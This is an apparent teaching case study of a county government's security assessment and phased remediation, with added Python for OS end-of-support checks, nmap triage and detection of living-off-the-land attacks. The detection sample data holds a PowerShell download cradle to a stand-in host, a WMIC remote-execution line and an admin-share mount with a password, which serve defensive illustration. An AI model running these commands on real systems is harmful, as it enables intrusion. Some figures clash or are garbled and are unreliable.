The Scenario

Smith County Government operates critical services for 287,000 residents across a network of approximately 800 computing systems: email infrastructure, document management platforms, permitting systems for building and business licenses, tax collection and payment processing, parks and recreation facility booking, voter registration, and human services case management. The IT department employs 18 people to operate and maintain this entire infrastructure. In February 2026, the County Board of Supervisors commissioned a vulnerability assessment as part of a compliance audit required for federal grant funding. The contracted security firm began scanning systems, reviewing configurations, and examining patch timelines.

The assessment’s findings, presented on March 1, 2026, were alarming:

End-of-Life Operating Systems: 412 of 800 systems (51.5%) were running Windows Server 2012 R2, for which Microsoft ended extended support on October 10, 2023; since that date, security fixes exist only through the paid Extended Security Updates program. An additional 150 systems (18.8%) were running Windows 7, unsupported since January 14, 2020. These systems had not received a single security patch in over 5 years, so every publicly disclosed vulnerability affecting Windows Server 2012 R2 or Windows 7 was unpatched on County systems.
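Turning the "which systems are past end of support, and for how long" question into a repeatable check, as an added example that is not part of the original case study. It takes an inventory of (hostname, OS caption) pairs, the form Active Directory's OperatingSystem attribute reports; the rows below are constructed to mirror the findings, the dates are Microsoft's published end-of-extended-support dates (paid ESU is not modelled), and the three-year minimum remaining support for a migration target is an assumption.

```python
"""Classify a Windows fleet inventory against Microsoft end-of-support dates.

Added example, not part of the original case study. The inventory rows are
constructed (hostnames invented); the dates are Microsoft's published
end-of-extended-support dates. Paid Extended Security Updates are ignored.
"""
from datetime import date

# End of extended support (last free security update) by product prefix.
END_OF_SUPPORT = {
    "Windows 7": date(2020, 1, 14),
    "Windows 8.1": date(2023, 1, 10),
    "Windows 10": date(2025, 10, 14),            # 22H2 was the last Windows 10 release
    "Windows Server 2012 R2": date(2023, 10, 10),
    "Windows Server 2016": date(2027, 1, 12),
    "Windows Server 2019": date(2029, 1, 9),
    "Windows Server 2022": date(2031, 10, 14),
}

AS_OF = date(2026, 3, 1)   # date of the assessment report in the scenario


def product_of(caption):
    """Map an OS caption (as AD or WMI reports it) to a table key.
    Longest prefix wins, so 'Windows 10 ...' is never read as 'Windows 1'."""
    for key in sorted(END_OF_SUPPORT, key=len, reverse=True):
        if caption.startswith(key):
            return key
    return None


def support_status(caption, as_of):
    """Return ('eol', days_past_end) or ('supported', days_left); ('unknown', None)
    when the caption is not in the table, which itself is a finding."""
    key = product_of(caption)
    if key is None:
        return ("unknown", None)
    delta = (END_OF_SUPPORT[key] - as_of).days
    return ("eol", -delta) if delta < 0 else ("supported", delta)


def is_acceptable_target(caption, as_of, min_years=3):
    """A migration target needs enough support left to outlive the migration
    project; otherwise the fleet is back where it started (assumed: 3 years)."""
    status, days = support_status(caption, as_of)
    return status == "supported" and days >= min_years * 365


def summarize(inventory, as_of):
    """Count EOL systems and list them, longest-unpatched first."""
    rows = list(inventory)
    eol = []
    for host, caption in rows:
        status, days = support_status(caption, as_of)
        if status == "eol":
            eol.append((days, host, caption))
    eol.sort(reverse=True)
    return {
        "total": len(rows),
        "eol": len(eol),
        "eol_share": len(eol) / len(rows),
        "worst_first": [(host, caption, days) for days, host, caption in eol],
    }


# Constructed sample inventory (hostnames invented).
SAMPLE_INVENTORY = [
    ("permit-app-01", "Windows Server 2012 R2 Standard"),
    ("tax-db-01", "Windows Server 2012 R2 Standard"),
    ("hsvc-case-01", "Windows Server 2012 R2 Datacenter"),
    ("fs-parks-01", "Windows Server 2019 Standard"),
    ("ws-clerk-117", "Windows 7 Professional"),
    ("ws-assessor-042", "Windows 7 Enterprise"),
    ("ws-permits-009", "Windows 10 Enterprise"),
    ("sw-mgmt-jump", "Windows Server 2022 Standard"),
    ("print-srv-01", "Windows Server 2016 Standard"),
    ("kiosk-lobby-03", "Ubuntu 22.04"),   # not in the table: reported as unknown
]

if __name__ == "__main__":
    report = summarize(SAMPLE_INVENTORY, AS_OF)
    print(f"{report['eol']} of {report['total']} systems "
          f"({report['eol_share']:.0%}) are past end of support")
    for host, caption, days in report["worst_first"]:
        print(f"  {host:16} {caption:36} unpatched for {days} days")
    for candidate in ("Windows Server 2019 Standard", "Windows Server 2022 Standard"):
        ok = is_acceptable_target(candidate, AS_OF)
        print(f"  migration target {candidate}: {'ok' if ok else 'too little support left'}")
```

Run against the real fleet by replacing SAMPLE_INVENTORY with the output of an AD or WMI query; the is_acceptable_target check is what would have caught Windows 10 (already unsupported on the assessment date) and flags Windows Server 2019 (under three years of support left) as poor targets for a multi-year migration.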

Plaintext Network Management: Telnet was enabled on 38 network switches (Cisco Catalyst, Juniper EX, HP ProCurve) for remote management. Telnet transmits credentials and every keystroke of the session in plaintext, so an attacker on the local network segment, or with access to any upstream link the traffic crosses, could capture switch administrator credentials and reconfigure network infrastructure. Telnet should have been disabled entirely in favor of SSH (secure shell), which encrypts the session, lets the administrator verify the device's host key, and provides the same remote management capability.

Publicly-Exposed Remote Access: Three RDP (Remote Desktop Protocol) instances were exposed directly to the internet on public IP addresses. Port scans showed that these systems accepted RDP connections from any source address. There was no multi-factor authentication protecting these endpoints, and during testing the security firm found that one system accepted the default credentials (Administrator / password), which had likely never been changed since the initial system build.

Zero Endpoint Monitoring: The County had deployed traditional antivirus (Windows Defender on some systems, Symantec on others, nothing on the legacy systems) but had no endpoint detection and response (EDR/XDR) tooling, no behavioral anomaly detection, and therefore no way to detect an attack in progress or lateral movement within the network.

Unmanaged Workstations: 340 workstations were running Windows 7 or older, unpatched, with no centralized patch management, no security baselines, and no verification that antivirus was even running. Users would call the IT help desk when machines slowed down because of infections, and IT would reimage Windows, sometimes from months-old disk images that did not include current patches.

Legacy Insecure Protocols: The assessment also found FTP (credentials and file contents in plaintext), unencrypted HTTP rather than HTTPS for internal web applications, and SNMP v1/v2c (community strings sent in plaintext) on network devices. These protocols predate modern security standards and add further attack surface.
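The Telnet, RDP, FTP, HTTP and SNMP findings above all come out of the same port scan, so the triage that turns scan output into ranked findings is worth showing. The block below is an added example, not part of the original assessment or any vendor tool: it parses nmap's grepable (-oG) output format, and the scan lines, hostnames and addresses are constructed. The severity table and fix text encode the page's guidance and are assumptions; whether a port is internet-exposed is taken from which scan it appeared in (a scan run from outside the network) rather than guessed from the address.

```python
"""Turn nmap grepable (-oG) output into ranked plaintext-protocol and
exposed-remote-access findings.

Added example, not part of the original case study. Scan lines are
constructed in nmap's -oG format; hosts and addresses are invented. The
severity table is an assumption that encodes the page's guidance.
"""
import re

# service -> (severity when reachable only inside the LAN, severity when reachable from the internet)
POLICY = {
    "telnet": ("high", "critical"),
    "rdp":    ("low", "critical"),
    "ftp":    ("medium", "high"),
    "http":   ("medium", "high"),
    "snmp":   ("medium", "high"),
}
FIX = {
    "telnet": "disable Telnet; manage the device over SSH",
    "rdp": "block at the perimeter; allow only through the MFA VPN gateway",
    "ftp": "replace with SFTP",
    "http": "serve over HTTPS",
    "snmp": "move to SNMPv3 authPriv; remove v1/v2c community strings",
}
SERVICE_ALIASES = {"ms-wbt-server": "rdp"}     # nmap's name for RDP
PORT_HINTS = {                                  # fallback when no service name is present
    ("tcp", 23): "telnet", ("tcp", 21): "ftp", ("tcp", 80): "http",
    ("udp", 161): "snmp", ("tcp", 3389): "rdp",
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
PORTS_RE = re.compile(r"Ports:\s+([^\t]+)")


def parse_host_line(line):
    """Yield (ip, name, port, proto, state, service) for each port on one -oG line.
    Each port entry is port/state/proto/owner/service/rpc/version."""
    h = HOST_RE.match(line)
    p = PORTS_RE.search(line)
    if not h or not p:          # e.g. a 'Host: ... Status: Up' line with no ports
        return
    ip, name = h.group(1), h.group(2)
    for entry in p.group(1).split(", "):
        fields = entry.split("/")
        if len(fields) < 5:
            continue
        yield ip, name, int(fields[0]), fields[2], fields[1], fields[4]


def triage(lines, external):
    """external=True means the scan ran from the internet, so every open port
    it shows is internet-exposed. Returns findings, most severe first."""
    findings = []
    for line in lines:
        for ip, name, port, proto, state, service in parse_host_line(line):
            if state != "open":
                continue
            svc = SERVICE_ALIASES.get(service, service) or PORT_HINTS.get((proto, port))
            if svc not in POLICY:
                continue
            severity = POLICY[svc][1 if external else 0]
            findings.append({"host": name or ip, "ip": ip, "port": f"{port}/{proto}",
                             "service": svc, "severity": severity, "fix": FIX[svc]})
    findings.sort(key=lambda f: (SEVERITY_ORDER[f["severity"]], f["host"]))
    return findings


# Constructed -oG lines: an internal scan and a scan from an internet vantage point.
INTERNAL_SCAN = [
    "Host: 10.20.1.5 (sw-core-01)\tPorts: 22/open/tcp//ssh///, 23/open/tcp//telnet///, "
    "161/open/udp//snmp///\tIgnored State: closed (997)",
    "Host: 10.20.4.12 (permit-app-01)\tPorts: 80/open/tcp//http///, 445/open/tcp//microsoft-ds///, "
    "3389/open/tcp//ms-wbt-server///",
    "Host: 10.20.4.20 (fs-records-01)\tPorts: 21/open/tcp//ftp///, 22/filtered/tcp//ssh///",
    "Host: 10.20.9.3 (ws-clerk-117)\tStatus: Up",
]
EXTERNAL_SCAN = [
    "Host: 198.51.100.7 (permit-app-01)\tPorts: 3389/open/tcp//ms-wbt-server///, 443/open/tcp//https///",
]

if __name__ == "__main__":
    for label, lines, ext in (("internal", INTERNAL_SCAN, False), ("external", EXTERNAL_SCAN, True)):
        print(f"--- {label} scan ---")
        for f in triage(lines, external=ext):
            print(f"{f['severity']:8} {f['host']:16} {f['port']:9} {f['service']:7} -> {f['fix']}")
```

The same RDP service on permit-app-01 lands at the bottom of the internal list and at the top of the external one, which is the point: exposure, not the protocol alone, sets the priority, and a scan from outside the perimeter is the only reliable way to know what is exposed.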

The security assessment concluded: “Smith County has accumulated a significant backlog of vulnerabilities across operating systems, network devices, and applications. The vast majority of systems are running operating systems that no longer receive security patches from Microsoft. An attacker who exploits a known vulnerability in Windows Server 2012 R2 or Windows 7 would have access to 562 County systems (70% of the total infrastructure).”

The County Board held an emergency meeting on March 8, 2026. The IT Director, Robert Chen, explained the situation: “To remediate all vulnerabilities fully, we need to replace or upgrade 562 systems. At an average cost of 1.1M in capital spending, plus ongoing operational costs. Our annual IT budget is $180,000.” The board members exchanged looks of dismay. They had no idea the infrastructure was this fragile.

One board member asked: “How bad is it really? What’s the actual risk?” Robert replied: “Imagine a major vulnerability is published in Windows Server 2012 R2. We can’t patch it. An attacker exploits the vulnerability and gains remote access to one of our permitting systems. From there, they move laterally to the network and compromise the tax collection system. They steal taxpayer banking information, or they demand ransom. Our incident response capability is almost zero—we have no way to detect lateral movement happening.”

Another board member asked: “Can we do any quick wins with our $50,000 emergency budget?” Robert and the security assessment team designed a phased approach:

Phase 1—Immediate Containment ($15,000 / 2 weeks):

  • Disable Telnet on all 38 switches; enable SSH instead with strong key-based authentication.
  • Firewall block all inbound RDP from the internet; allow RDP only from a VPN gateway with multi-factor authentication.
  • Migrate 8 critical systems (permitting, tax collection, human services, and voter registration) to a currently supported operating system. Windows 10 is not a valid target: its own support ended on October 14, 2025. This reduces the exposure of the highest-value targets.
  • Implement EDR (endpoint detection and response) on those 8 critical systems to enable detection of lateral movement and live attacks.

Phase 2—Gradual Modernization ($20,000 / months 3-6):

  • Migrate another 24 critical systems from Windows Server 2012 R2 to a currently supported Windows Server release (Windows Server 2022 or 2025; Windows Server 2019 leaves extended support on January 9, 2029, too little runway for a migration that itself takes years).
  • Expand EDR to all critical systems (32 total).
  • Implement centralized patch management and security baselines for all upgraded systems.

Phase 3—Long-Term Plan ($ongoing / 2-3 years):

  • Develop a multi-year capital plan to upgrade the remaining 530 legacy systems.
  • Request federal grant funding to support the modernization (state and local governments can apply to programs such as the CISA/FEMA State and Local Cybersecurity Grant Program).
  • Retire systems that have no remaining business value rather than continuing to patch them.

The reality was grim: even with this aggressive phased plan, Smith County would not be fully remediated for 3–4 years. For that entire period, 530 systems would remain unpatched, vulnerable to known exploits, and unable to run modern security controls.

What Went Right

  • Vulnerability assessment identified the full scope of the problem: Rather than discovering vulnerabilities one at a time through breaches, the assessment provided a complete picture of exposure, enabling prioritized remediation.

  • Phased approach prioritized critical systems: Rather than trying to remediate everything and failing, the team focused on the highest-value targets (tax collection, permitting, voter registration). This approach provided the best risk reduction with limited budget.

  • Compensating controls bridged the gap: Blocking RDP at the perimeter, moving switch management to SSH, and putting EDR on the critical systems gave the County a way to detect and contain a breach of a legacy system before it reached the high-value targets, even though those legacy systems themselves could not be fixed yet.

  • Transparent communication to leadership about constraints: IT leadership didn’t hide the problem or make excuses; they explained it clearly and provided data-driven prioritization.

What Could Go Wrong

  • End-of-life systems with no patch path are a permanent vulnerability: Windows Server 2012 R2 left extended support on October 10, 2023. Apart from Microsoft's paid Extended Security Updates, a time-limited bridge rather than a fix, no patches exist for vulnerabilities discovered after that date. Organizations must upgrade or retire such systems, or isolate them and accept the unmitigated vulnerability; there is no other path.

  • Plaintext network protocols enable lateral movement: Telnet on switches means that an attacker who compromises a single workstation and can get onto the management traffic's path (on the same segment, or via ARP spoofing) can capture switch credentials and then reconfigure VLANs, disable logging, or create backdoors. SSH is mandatory for network device management.

  • Publicly-exposed RDP without MFA is a critical vulnerability: RDP is a common attack vector. Exposed to the internet with weak or default credentials, it offers attackers trivial access to systems. RDP should never be exposed to the internet; it should be accessible only through a VPN gateway with multi-factor authentication.

  • No endpoint detection means no visibility into active attacks: Traditional antivirus relies mainly on signatures and file-based heuristics. An attacker using unknown malware, or living off the land with legitimate tools (PowerShell, cmd.exe, wmic), can operate undetected on systems without EDR. No visibility means no incident response capability.

  • Underfunded IT budgets compound over time into technical debt: The County's $180,000 annual IT budget spread across 800 systems is about $225 per system per year for all operations, maintenance, and security. In such resource-constrained environments, systems gradually age out of support without being replaced. This is a structural problem, not an individual failure.
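The "no visibility" point above is about the living-off-the-land activity (PowerShell, cmd.exe, wmic) that antivirus does not flag. As an added example, not part of the original case study or of any EDR product, the block below runs a few detection rules over Windows process-creation records (Security event 4688) to show what that visibility looks like. The event records are constructed; the rule names, the keyword list and the encoded-command payload are assumptions.

```python
"""Flag living-off-the-land activity in Windows process-creation (4688) events.

Added example, not part of the original case study. The event records are
constructed with the fields of Security event 4688, which carries the
command line only when command-line auditing is enabled. Rule names and
the keyword list are assumptions.
"""
import base64
import re

# Regex for PowerShell's -EncodedCommand and its accepted abbreviations.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_PS = ("downloadstring", "invoke-expression", "iex ", "frombase64string")
ADMIN_SHARE_RE = re.compile(r"net\s+use\s+\\\\\S+\\(?:c|admin)\$")


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event):
    """Apply the rules to one 4688-style record; return a list of (rule, detail)."""
    image = event["image"].lower()
    cmd = event["command_line"]
    lower = cmd.lower()
    hits = []
    if image.endswith("wmic.exe") and "/node:" in lower and "process call create" in lower:
        hits.append(("wmi_remote_exec", "WMIC process creation on a remote host"))
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("ps_encoded_command", decoded.strip()))
            lower += " " + decoded.lower()          # inspect the decoded script too
        if any(k in lower for k in SUSPICIOUS_PS):
            hits.append(("ps_download_cradle", "download/exec keyword in command line"))
        if "-w hidden" in lower or "-windowstyle hidden" in lower:
            hits.append(("ps_hidden_window", "PowerShell launched with a hidden window"))
    if image.endswith("cmd.exe") and ADMIN_SHARE_RE.search(lower):
        hits.append(("admin_share_mount", "admin share mounted with explicit credentials"))
    return hits


def scan(events):
    """Return (computer, user, rule, detail) for every rule hit across the events."""
    return [(ev["computer"], ev["user"], rule, detail)
            for ev in events for rule, detail in detect(ev)]


# Constructed sample: a download cradle, WMI lateral movement, an admin-share
# mount, and two benign commands that must not fire.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"computer": "permit-app-01", "user": "SMITH\\svc_permit", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"computer": "permit-app-01", "user": "SMITH\\svc_permit", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic /node:tax-db-01 /user:SMITH\admin process call create "cmd.exe /c whoami"'},
    {"computer": "permit-app-01", "user": "SMITH\\svc_permit", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c net use \\tax-db-01\C$ /user:SMITH\admin P@ssw0rd"},
    {"computer": "fs-parks-01", "user": "SMITH\\svc_backup", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"computer": "fs-parks-01", "user": "SMITH\\helpdesk", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get caption"},
]

if __name__ == "__main__":
    for computer, user, rule, detail in scan(SAMPLE_EVENTS):
        print(f"{computer:14} {user:20} {rule:20} {detail}")
```

Even this much depends on telemetry the County did not have: 4688 carries the command line only when command-line auditing is on (the ProcessCreationIncludeCmdLine_Enabled policy), and PowerShell script block logging (event 4104) is needed to see what an encoded or downloaded script actually did. EDR collects that telemetry, plus parent/child and network context, and runs far more rules than these; the example shows the shape of the visibility, not a substitute for it.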

Key Takeaways

  • End-of-life systems are unpatched and indefensible: Systems past end-of-support receive no security patches, so every known vulnerability is exploitable. Organizations must replace or retire end-of-life systems; patching them is no longer an option, beyond a paid and time-limited ESU bridge.

  • Default credentials must be changed immediately: Network switches, printers, cameras, and freshly built servers frequently ship with well-known default credentials. Change all default credentials during initial deployment. Automated inventory tools should flag any systems still using defaults.

  • Plaintext protocols (Telnet, FTP, SNMP v1/v2c) should be completely disabled: Replace Telnet with SSH (key-based authentication), FTP with SFTP or FTPS, and SNMP v1/v2c with SNMPv3. These upgrades provide the same functionality with encryption and strong authentication.

  • Remote access without VPN and MFA is a critical vulnerability: Exposing RDP, SSH, or other management protocols directly to the internet without multi-factor authentication is indefensible. Use a VPN gateway (with MFA) to gate all remote access.

  • Vulnerability assessments reveal structural problems: When over half of all systems (51.5%) are running unsupported operating systems, the problem is not technical (we know how to fix it); it is structural (there is no budget to fix it). Organizations must plan and budget for regular system replacement rather than wait for a crisis to force upgrades.